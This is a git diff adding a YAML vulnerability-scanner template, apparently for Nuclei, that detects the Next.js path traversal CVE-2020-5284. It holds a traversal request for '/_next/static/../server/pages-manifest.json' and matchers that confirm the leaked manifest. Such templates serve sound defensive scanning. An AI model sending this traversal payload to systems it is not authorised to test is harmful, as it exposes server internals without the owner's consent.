diff --git a/cves/nextjs-cve-2020-5284.yaml b/cves/nextjs-cve-2020-5284.yaml
new file mode 100644
index 0000000000..72515cd7bc
--- /dev/null
+++ b/cves/nextjs-cve-2020-5284.yaml
@@ -0,0 +1,18 @@
+id: nextjs-cve-2020-5284
+
+info:
+  name: Next.js .next/ limited path traversal
+  author: Harsh & Rahul
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/_next/static/../server/pages-manifest.json"
+    matchers:
+      - type: regex
+        regex:
+          - '\{"/_app":".*?_app\.js"'
+      - type: status
+        status:
+          - 200